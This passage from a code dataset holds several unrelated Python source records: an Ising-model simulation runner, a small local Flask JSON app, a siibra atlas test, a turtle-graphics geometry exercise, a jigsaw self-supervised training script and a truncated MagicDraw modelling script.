parameters.neighborhood,\n parameters.interaction_coefficients,\n )\n data: SimulationData = isingmodel.data.setup_containers(\n parameters=parameters,\n state=lattice.sample_random_state(),\n )\n\n pre_simulation(\n lattice=lattice,\n data=data,\n )\n main_simulation(\n lattice=lattice,\n data=data,\n )\n post_simulation(\n lattice=lattice,\n data=data,\n )\n\n return data\n\n\ndef pre_simulation(\n lattice: BinaryLattice,\n data: SimulationData,\n) -> None:\n \"\"\"Run equilibration sweeps.\n\n :param lattice: Structural information and neighbor tables.\n :param data: Data container for the simulation.\n \"\"\"\n for sweep_index in range(data.parameters.equilibration_sweeps):\n isingmodel.sampling.sweep_grid(\n lattice=lattice,\n data=data,\n sweep_index=sweep_index,\n equilibration_run=True,\n )\n\n\ndef main_simulation(\n lattice: BinaryLattice,\n data: SimulationData,\n) -> None:\n \"\"\"Run the production sweeps for the Ising model simulation.\n\n :param lattice: Structural information and neighbor tables.\n :param data: Data container for the simulation.\n \"\"\"\n isingmodel.model.ising_save_full_state(lattice=lattice, data=data)\n for sweep_index in range(data.parameters.sweeps):\n isingmodel.sampling.sweep_grid(\n lattice=lattice,\n data=data,\n sweep_index=sweep_index,\n equilibration_run=False,\n )\n\n\ndef post_simulation(\n lattice: BinaryLattice,\n data: SimulationData,\n) -> None:\n \"\"\"Write the simulation history to disk and print estimators.\n\n :param lattice: Structural information and neighbor tables.\n :param data: Data container for the simulation.\n \"\"\"\n isingmodel.data.write_trace_to_disk(data=data)\n\n average_energy: float = \\\n data.estimators.energy_1st_moment / lattice.number_sites\n fm_order_parameter: float = \\\n data.estimators.magnetization_1st_moment / lattice.number_sites\n afm_order_parameter: float = (\n data.estimators.magnetization_even_sites_1st_moment -\n data.estimators.magnetization_odd_sites_1st_moment\n ) / lattice.number_sites\n print(f\"Average energy = {average_energy}\")\n print(f\"FM order parameter = {fm_order_parameter}\")\n print(f\"AFM order parameter = {afm_order_parameter}\")\n","sub_path":"isingmodel/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"109706485","text":"import json\nfrom flask import Flask, render_template, make_response, url_for, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef drawNodes():\n return render_template('index.html')\n\n@app.route('/receiveJSON', methods = ['POST'])\ndef receiveJSON():\n data = request.get_json()\n\n if data != None:\n with open('saved_data.json', 'w') as f:\n f.write(json.dumps(data, indent = 2))\n\n return json.dumps(data)\n\n@app.route('/getJSON', methods = ['GET'])\ndef getJSON():\n with open('saved_data.json', 'r') as f:\n data = json.load(f)\n\n return json.dumps(data)\n\nif __name__ == '__main__':\n app.run(debug = True, host = '127.0.0.1', port = 5000)\n","sub_path":"DrawNodes.py","file_name":"DrawNodes.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"277291785","text":"import os\nimport unittest\nfrom siibra.atlas import REGISTRY\nimport siibra as sb\nfrom test.get_token import get_token\n\ntoken = get_token()\nos.environ['HBP_AUTH_TOKEN'] = token[\"access_token\"]\n\nclass TestSelectionBrainRegions(unittest.TestCase):\n\n def test_select_brain_regions(self):\n atlas = REGISTRY.MULTILEVEL_HUMAN_ATLAS\n atlas.select_parcellation(sb.parcellations.JULICH_BRAIN_CYTOARCHITECTONIC_MAPS_2_5)\n # we can just give a string and see if the system can disambiguiate it\n atlas.select_region('v1')\n print(\"Selected region from 'v1' is\", atlas.selected_region)\n self.assertEqual(atlas.selected_region.name, 'Area hOc1 (V1, 17, CalcS)')\n self.assertTrue(len(atlas.selected_region.children) == 2)\n\n print('v1 includes the left and right hemisphere!')\n print(repr(atlas.selected_region))\n\n # we can be more specific easily\n atlas.select_region('v1 left')\n print(\"Selected region from 'v1 left' is\", atlas.selected_region)\n self.assertEqual(atlas.selected_region.name, 'Area hOc1 (V1, 17, CalcS) left')\n self.assertTrue(len(atlas.selected_region.children) == 0)\n\n # we can also auto-complete on the 'regionnames' attribute of the atlas\n # - this immediately leads to a unique selection\n atlas.select_region(atlas.regionnames.AREA_HOC1_V1_17_CALCS_LEFT_HEMISPHERE)\n self.assertEqual(atlas.selected_region.name, 'Area hOc1 (V1, 17, CalcS) left')\n self.assertTrue(len(atlas.selected_region.children) == 0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/test_selecting_brain_regions_from_an_atlas.py","file_name":"test_selecting_brain_regions_from_an_atlas.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"32009171","text":"# Turtle\r\nfrom turtle import *\r\nt = Turtle()\r\nt.speed(0)\r\nt.left(90)\r\n\r\n# Funktionen\r\ndef istPunkt(L):\r\n if type(L) == list:\r\n if len(L) == 2:\r\n if (type(L[0]) == int) and (type(L[1]) == int):\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\ndef istStreckenzug(L):\r\n if type(L) == list:\r\n if len(L) == 0:\r\n return True\r\n else:\r\n if istPunkt(L[0]):\r\n return istStreckenzug(L[1:])\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\ndef istFigur(L):\r\n if type(L) == list:\r\n if len(L) == 0:\r\n return True\r\n else:\r\n if istStreckenzug(L[0]) or istFigur(L[0]):\r\n return istFigur(L[1:])\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\ndef zeichnePunktListe(punktListe):\r\n if punktListe != []:\r\n punkt = punktListe[0]\r\n t.goto(punkt)\r\n zeichnePunktListe(punktListe[1:])\r\n\r\ndef zeichneStreckenzug(streckenzug):\r\n if istStreckenzug(streckenzug): \r\n if streckenzug != []:\r\n punkt = streckenzug[0]\r\n t.up()\r\n t.goto(punkt)\r\n t.down()\r\n zeichnePunktListe(streckenzug[1:])\r\n\r\ndef zeichneFigur(figur):\r\n if istFigur(figur):\r\n if figur != []:\r\n objekt = figur[0]\r\n if istStreckenzug(objekt):\r\n zeichneStreckenzug(objekt)\r\n else:\r\n zeichneFigur(objekt)\r\n zeichneFigur(figur[1:])\r\n\r\ndef xVerschiebenPunkt(punkt, x):\r\n if istPunkt(punkt):\r\n return [punkt[0]+x, punkt[1]]\r\n\r\ndef xVerschiebenStreckenzug(streckenzug, x):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return [xVerschiebenPunkt(punkt, x)] + xVerschiebenStreckenzug(restStreckenzug, x)\r\n\r\ndef xVerschiebenFigur(figur, x):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return [xVerschiebenStreckenzug(erstesElement, x)] + xVerschiebenFigur(restFigur, x)\r\n else:\r\n return [xVerschiebenFigur(erstesElement, x)] + xVerschiebenFigur(restFigur, x)\r\n\r\ndef yVerschiebenPunkt(punkt, y):\r\n if istPunkt(punkt):\r\n return [punkt[0], punkt[1] + y]\r\n\r\ndef yVerschiebenStreckenzug(streckenzug, y):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return [yVerschiebenPunkt(punkt, y)] + yVerschiebenStreckenzug(restStreckenzug, y)\r\n\r\ndef yVerschiebenFigur(figur, y):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return [yVerschiebenStreckenzug(erstesElement, y)] + yVerschiebenFigur(restFigur, y)\r\n else:\r\n return [yVerschiebenFigur(erstesElement, y)] + yVerschiebenFigur(restFigur, y)\r\n\r\ndef xyVerschiebenPunkt(punkt, x, y):\r\n if istPunkt(punkt):\r\n return [punkt[0] + x, punkt[1] + y]\r\n\r\ndef xyVerschiebenStreckenzug(streckenzug, x, y):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return [xyVerschiebenPunkt(punkt, x, y)] + xyVerschiebenStreckenzug(restStreckenzug, x, y)\r\n\r\ndef xyVerschiebenFigur(figur, x, y):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return [xyVerschiebenStreckenzug(erstesElement, x, y)] + xyVerschiebenFigur(restFigur, x, y)\r\n else:\r\n return [xyVerschiebenFigur(erstesElement, x, y)] + xyVerschiebenFigur(restFigur, x, y)\r\n\r\ndef xSpiegelnPunkt(punkt):\r\n if istPunkt(punkt):\r\n return [punkt[0], -1 * punkt[1]]\r\n\r\ndef xSpiegelnStreckenzug(streckenzug):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return xSpiegelnStreckenzug(restStreckenzug) + [xSpiegelnPunkt(punkt)]\r\n\r\ndef xSpiegelnFigur(figur):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return xSpiegelnFigur(restFigur) + [xSpiegelnStreckenzug(erstesElement)]\r\n else:\r\n return xSpiegelnFigur(restFigur) + [xSpiegelnFigur(erstesElement)]\r\n\r\ndef ySpiegelnPunkt(punkt):\r\n if istPunkt(punkt):\r\n return [-1 * punkt[0], punkt[1]]\r\n\r\ndef ySpiegelnStreckenzug(streckenzug):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return ySpiegelnStreckenzug(restStreckenzug) + [ySpiegelnPunkt(punkt)]\r\n\r\ndef ySpiegelnFigur(figur):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return ySpiegelnFigur(restFigur) + [ySpiegelnStreckenzug(erstesElement)]\r\n else:\r\n return ySpiegelnFigur(restFigur) + [ySpiegelnFigur(erstesElement)]\r\n\r\n# Beispiel\r\nstuetzelinks = [[0, 0],[20, 0],[50, 100],[30, 100],[0, 0]]\r\nblockunten = [[90, 10],[110, 10],[110, 30],[90, 30],[90, 10]]\r\nblockoben = [[90, 70],[110, 70],[110, 90],[90, 90],[90, 70]]\r\nraute = [[80, 50],[100, 40],[120, 50],[100, 60],[80, 50]]\r\nverbindung1 = [[100, 110], [100, 90]]\r\nverbindung2 = [[100, 70], [100, 60]]\r\nverbindung3 = [[100, 40], [100, 30]]\r\nverbindung4 = [[100, 10], [100, 0]]\r\nverbindung5 = [[80, 50], [70, 50], [70, 100], [100, 100]]\r\nstuetzerechts = [verbindung1, blockoben, verbindung2, raute, \\\r\n verbindung5, verbindung3, blockunten, verbindung4]\r\ndach = [[10, 110],[130, 110],[130, 125],[70, 140],[10, 125],[10, 110]]\r\ntor = [stuetzelinks, stuetzerechts, dach]\r\nrahmen = [[0, 0],[140, 0],[140, 140],[0, 140],[0, 0]]\r\nlogo = [tor, rahmen]\r\n\r\n# Test\r\nzeichneFigur(logo)\r\nlogoNeu = ySpiegelnFigur(logo)\r\nzeichneFigur(logoNeu)\r\n","sub_path":"02 Algorithmen/20180208/geometrischeObjekte.py","file_name":"geometrischeObjekte.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"200793037","text":"import os\nimport uuid\nimport torch\nimport torch.nn as nn\nimport models\nimport argparse\nimport torchvision\nimport tensorboardX\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\n\nfrom utils import split_image, combine_image\nfrom ss import rotation, JigsawGenerator\n\ntorch.backends.cudnn.benchmark = True\n\nparser = argparse.ArgumentParser(description='Selfie')\nparser.add_argument('--data', metavar='DIR',\n help='path to dataset')\nparser.add_argument('--dataset', type=str, default=\"CUB\")\nparser.add_argument('--arch', '-a', metavar='ARCH', default='resnet50',\n help='model architecture: ')\nparser.add_argument('-j', '--workers', default=8, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--epochs', default=1000, type=int, metavar='N',\n help='number of steps of selfie')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('-b', '--batch-size', default=32, type=int,\n metavar='N', help='mini-batch size (default: 256)')\nparser.add_argument('--lr', '--learning-rate', default=0.001, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--lr-method', default='step', type=str,\n help='method of learning rate')\nparser.add_argument('--lr-params', default=[], dest='lr_params',nargs='*',type=float,\n action='append', help='params of lr method')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=3e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--print-freq', '-p', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--gpu', default=None, type=int,\n help='GPU id to use.')\nparser.add_argument('--store-model-everyepoch', dest='store_model_everyepoch', action='store_true',\n help='store checkpoint in every epoch')\nparser.add_argument('--evaluation', action=\"store_true\")\nparser.add_argument('--resume', action=\"store_true\")\n\nparser.add_argument('--load-weights', default=None, type=str)\nparser.add_argument('--task', type=str, default=uuid.uuid1())\nparser.add_argument('--with-rotation', action=\"store_true\")\nparser.add_argument('--with-jigsaw', action=\"store_true\")\nparser.add_argument('--seperate-layer4', action=\"store_true\")\nparser.add_argument('--rotation-aug', action=\"store_true\")\n\nclass fake:\n def step():\n pass\n\ndef main():\n global args, best_prec1, summary_writer, jigsaw\n\n jigsaw = JigsawGenerator(30)\n args = parser.parse_args()\n summary_writer = tensorboardX.SummaryWriter(os.path.join('logs', args.task))\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n print(args)\n\n if args.dataset == 'CUB':\n traindir = os.path.join(args.data, 'train')\n valdir = os.path.join(args.data, 'val')\n train_transforms = transforms.Compose([\n transforms.Resize(448),\n transforms.CenterCrop(448),\n transforms.ToTensor(),\n normalize,\n ])\n val_transforms = transforms.Compose([\n transforms.Resize(448),\n transforms.CenterCrop(448),\n transforms.ToTensor(),\n normalize,\n ])\n num_classes = 200\n train_dataset = datasets.ImageFolder(traindir, train_transforms)\n val_dataset = datasets.ImageFolder(valdir, val_transforms)\n elif args.dataset == 'cifar':\n train_transforms = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n val_transforms = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n train_dataset = datasets.CIFAR10(args.data, True, train_transforms)\n val_dataset = datasets.CIFAR10(args.data, False, val_transforms)\n else:\n raise NotImplementedError\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=True,\n num_workers=args.workers, pin_memory=True, drop_last = True)\n\n val_loader = torch.utils.data.DataLoader(\n val_dataset,\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True, drop_last = True)\n\n model = torchvision.models.resnet50(pretrained = False)\n if args.dataset == 'cifar':\n model.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=2, bias=False)\n \n model.fc = nn.Linear(2048, 30)\n\n criterion = nn.CrossEntropyLoss().cuda()\n if args.gpu is None:\n model = torch.nn.DataParallel(model)\n model = model.cuda()\n else:\n model = model.cuda()\n\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr,\n momentum=0.9,\n weight_decay=args.weight_decay)\n\n #scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, float(args.epochs))\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [60, 150], 0.7)\n best_prec1 = 0\n\n if not os.path.exists(os.path.join('models', str(args.task))):\n os.mkdir(os.path.join('models', str(args.task)))\n\n for epoch in range(args.start_epoch, args.epochs):\n trainObj, top1 = train(train_loader, model, criterion, optimizer, scheduler, epoch)\n _,_ = train(val_loader, model, criterion, optimizer, fake, epoch)\n valObj, prec1 = val(val_loader, model, criterion)\n summary_writer.add_scalar(\"train_loss\", trainObj, epoch)\n summary_writer.add_scalar(\"test_loss\", valObj, epoch)\n summary_writer.add_scalar(\"train_acc\", top1, epoch)\n summary_writer.add_scalar(\"test_acc\", prec1, epoch)\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n if is_best:\n torch.save(\n {\n 'epoch': epoch,\n 'model_state': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_prec1': best_prec1,\n }, os.path.join('models', str(args.task), 'checkpoint.pth.tar'))\n torch.save(\n {\n 'epoch': epoch,\n 'model_state': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_prec1': best_prec1,\n }, os.path.join('models', str(args.task), 'model_best.pth.tar'))\n else:\n torch.save(\n {\n 'epoch': epoch,\n 'model_state': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_prec1': best_prec1,\n }, os.path.join('models', str(args.task), 'checkpoint.pth.tar'))\n\ndef train(train_loader, model, criterion, optimizer, scheduler, epoch):\n global args\n losses = AverageMeter()\n top1 = AverageMeter()\n model.train()\n for index, (input, target) in enumerate(train_loader):\n input = input.cuda(args.gpu)\n if args.dataset == 'CUB':\n splited_list = split_image(input, 112)\n elif args.dataset == 'cifar':\n splited_list = split_image(input, 8)\n splited_list = [i.unsqueeze(1) for i in splited_list]\n jigsaw_stacked = torch.cat(splited_list, 1)\n jigsaw_stacked, target = jigsaw(jigsaw_stacked)\n jigsaw_stacked = combine_image(jigsaw_stacked, 4)\n\n output = model(jigsaw_stacked)\n\n loss = criterion(output, target)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n prec1 = accuracy(output, target, topk=(1,))\n losses.update(loss.item(), input.shape[0])\n top1.update(prec1[0].item(), input.shape[0])\n\n if index % args.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'.format(\n epoch, index, len(train_loader), loss=losses, top1=top1))\n scheduler.step()\n return losses.avg, top1.avg\n\ndef val(val_loader, model, criterion):\n global args\n losses = AverageMeter()\n top1 = AverageMeter()\n model.eval()\n with torch.no_grad():\n for index, (input, target) in enumerate(val_loader):\n input = input.cuda(args.gpu)\n if args.dataset == 'CUB':\n splited_list = split_image(input, 112)\n elif args.dataset == 'cifar':\n splited_list = split_image(input, 8)\n splited_list = [i.unsqueeze(1) for i in splited_list]\n jigsaw_stacked = torch.cat(splited_list, 1)\n jigsaw_stacked, target = jigsaw(jigsaw_stacked)\n jigsaw_stacked = combine_image(jigsaw_stacked, 4)\n\n output = model(jigsaw_stacked)\n loss = criterion(output, target)\n\n prec1 = accuracy(output, target, topk=(1,))\n losses.update(loss.item(), input.shape[0])\n top1.update(prec1[0].item(), input.shape[0])\n\n if index % args.print_freq == 0:\n print('Epoch: [{0}/{1}]\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'.format(\n index, len(val_loader), loss=losses, top1=top1))\n\n return losses.avg, top1.avg\n\ndef accuracy(output, target, topk=(1,)):\n #print(output.shape)\n #print(target.shape)\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n #print(target)\n if (target.dim() > 1):\n target = torch.argmax(target, 1)\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n torch.save(state, filename[0])\n if is_best:\n shutil.copyfile(filename[0], filename[1])\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\nif __name__ == '__main__':\n main()","sub_path":"train_jigsaw.py","file_name":"train_jigsaw.py","file_ext":"py","file_size_in_byte":10944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"321501202","text":"from java.lang import *\nfrom com.nomagic.magicdraw.uml.symbols import *\nfrom com.nomagic.magicdraw.core import Application\nfrom com.nomagic.uml2.ext.jmi.helpers import StereotypesHelper\nfrom com.nomagic.magicdraw.openapi.uml import SessionManager\nfrom com.nomagic.magicdraw.openapi.uml import ModelElementsManager\nfrom com.nomagic.uml2.ext.jmi.helpers import ModelHelper\nfrom com.nomagic.magicdraw.ui.dialogs import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mdkernel import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mddependencies import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mdinterfaces import *\nfrom com.nomagic.uml2.ext.magicdraw.actions.mdbasicactions import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdbasicactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdintermediateactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.auxiliaryconstructs.mdinformationflows import *\nfrom com.nomagic.uml2.ext.magicdraw.compositestructures.mdports import *\nfrom com.nomagic.uml2.ext.magicdraw.commonbehaviors.mdsimpletime import *\nfrom com.nomagic.uml2.ext.magicdraw.compositestructures.mdinternalstructures import *\n\nfrom com.nomagic.magicdraw.teamwork.application import TeamworkUtils\nimport sys\nimport traceback\nimport os\nfrom javax.swing import JOptionPane\nimport MDUtils._MDUtils as MDUtils\nreload(MDUtils)\nimport SRUtils\nreload(SRUtils)\n\ngl = Application.getInstance().getGUILog()\nproject = Application.getInstance().getProject()\nef = project.getElementsFactory()\nmem = ModelElementsManager.getInstance()\nsm = SessionManager.getInstance()\n\n\ndef findOppositeEnd(role1, end1, connector):\n for end in connector.getEnd():\n if end.getRole() is not role1:\n return end\n for end in connector.getEnd():\n if end is not end1:\n return end\n return None\n\ndef findPeerParts(part):\n owner = part.getOwner()\n res = []\n for p in owner.getOwnedAttribute():\n if p is not part:\n res.append(p)\n return res\n\ndef pathUnderPart(end, part):\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None and len(paths) > 0:\n if paths.get(0) is part:\n return True\n return False\n\ndef findPartsTypedBy(type):\n parts = type.get_typedElementOfType()\n res = []\n res.extend(parts)\n return res\n\ndef copyPropertyPaths(fromEnd, toEnd):\n paths = StereotypesHelper.getStereotypePropertyValue(fromEnd, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None:\n for path in paths:\n StereotypesHelper.setStereotypePropertyValue(toEnd, SRUtils.nestedEndS, \"propertyPath\", path, True)\n\ndef copyMultiplicity(prop, newprop):\n newprop.setLowerValue(SRUtils.cloneValueSpec(prop.getLowerValue()))\n newprop.setUpperValue(SRUtils.cloneValueSpec(prop.getUpperValue()))\n newprop.setUnique(prop.isUnique())\n newprop.setOrdered(prop.isOrdered())\n \ndef movePartDown(part, newOwner, ownerPart):\n ends = part.getEnd()\n asso = part.getAssociation()\n \n newasso = ef.createAssociationInstance()\n newasso.setOwner(newOwner.getOwner())\n newProp = newasso.getMemberEnd().get(0)\n newProp2 = newasso.getMemberEnd().get(1)\n newProp.setType(part.getType())\n newProp2.setType(newOwner)\n newProp.setOwner(newOwner)\n newProp2.setOwner(newasso)\n newProp.setAggregation(part.getAggregation())\n newProp.setName(part.getName())\n copyMultiplicity(part, newProp)\n MDUtils.copyStereotypes(part, newProp)\n \n bad = []\n for end in ends:\n oppend = findOppositeEnd(part, end, end.get_connectorOfEnd())\n if oppend.getRole() is part:\n bad.append(end)\n continue\n newconn = ef.createConnectorInstance()\n partend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n partend.setRole(newProp)\n newoppend.setRole(oppend.getRole())\n \n if StereotypesHelper.hasStereotype(end, SRUtils.nestedEndS):\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n copyPropertyPaths(end, partend)\n StereotypesHelper.setStereotypePropertyValue(partend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n copyPropertyPaths(oppend, newoppend)\n elif end.get_connectorOfEnd().getOwner() is part.getType():\n newconn.setOwner(part.getType())\n copyPropertyPaths(oppend, newoppend)\n elif not StereotypesHelper.hasStereotype(oppend, SRUtils.nestedEndS):\n if oppend.getRole() is ownerPart:\n newconn.setOwner(newOwner)\n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner()) \n StereotypesHelper.setStereotypePropertyValue(partend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n else:\n if pathUnderPart(oppend, ownerPart):\n newconn.setOwner(newOwner)\n paths = []\n proppath = StereotypesHelper.getStereotypePropertyValue(oppend, \"NestedConnectorEnd\", \"propertyPath\")\n paths.extend(proppath)\n if len(paths) == 1:\n pass\n else:\n newpaths = paths[1:]\n for path in newpaths:\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", path, True) \n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n StereotypesHelper.setStereotypePropertyValue(partend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n copyPropertyPaths(oppend, newoppend)\n movePartDownPorts(part, newOwner, ownerPart, newProp)\n movePartDownChildren(part, newOwner, ownerPart, newProp)\n if len(bad) > 0:\n gl.log(\"There's one or more connector from the original part to itself, those are not replicated\")\n mem.removeElement(part)\n\ndef movePartDownChildren(part, newOwner, ownerPart, newProp):\n childs = []\n findAllChildrenParts(part, childs)\n for child in childs:\n for end in list(child.getEnd()):\n if StereotypesHelper.hasStereotype(end, SRUtils.nestedEndS):\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None and part in paths:\n newconn = ef.createConnectorInstance()\n thisend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n thisend.setRole(end.getRole())\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newoppend.setRole(oppend.getRole())\n \n opppaths = StereotypesHelper.getStereotypePropertyValue(oppend, SRUtils.nestedEndS, \"propertyPath\")\n if opppaths is not None and len(opppaths) > 0 and opppaths.get(0) is ownerPart:\n newconn.setOwner(newOwner)\n newpath = [newProp]\n newpath.extend(paths[1:])\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n newpath = opppaths[1:]\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n elif oppend.getRole() is ownerPart:\n newconn.setOwner(newOwner)\n newpath = [newProp]\n newpath.extend(paths[1:])\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n index = paths.indexOf(part)\n firstpart = paths[:index]\n secondpart = paths[index+1:]\n newpath = []\n newpath.extend(firstpart)\n newpath.append(ownerPart)\n newpath.append(newProp)\n newpath.extend(secondpart)\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n copyPropertyPaths(oppend, newoppend)\n mem.removeElement(end.get_connectorOfEnd())\n\n\ndef findAllChildrenParts(part, childs):\n type = part.getType()\n if type is not None and isinstance(type, Class):\n for attr in type.getOwnedAttribute():\n if not isinstance(attr, Port):\n if attr not in childs:\n childs.append(attr)\n findAllChildrenParts(attr, childs)\n \n \ndef movePartDownPorts(part, newOwner, ownerPart, newProp):\n portends = findPortEnds(part)\n for end in portends:\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newconn = ef.createConnectorInstance()\n newconn.getEnd().get(0).setRole(end.getRole())\n newconn.getEnd().get(1).setRole(oppend.getRole())\n portend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if len(paths) > 1:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n newpaths = paths[:-1]\n for path in newpaths:\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n portend.setPartWithPort(newProp)\n copyPropertyPaths(oppend, newoppend)\n else:\n oppathes = StereotypesHelper.getStereotypePropertyValue(oppend, SRUtils.nestedEndS, \"propertyPath\")\n if len(oppathes) > 0 and oppathes.get(0) is ownerPart:\n newconn.setOwner(newOwner)\n if len(oppathes) > 1:\n newoppathes = oppathes[1:]\n for path in newoppathes:\n StereotypesHelper.setStereotypePropertyValue(newoppend, 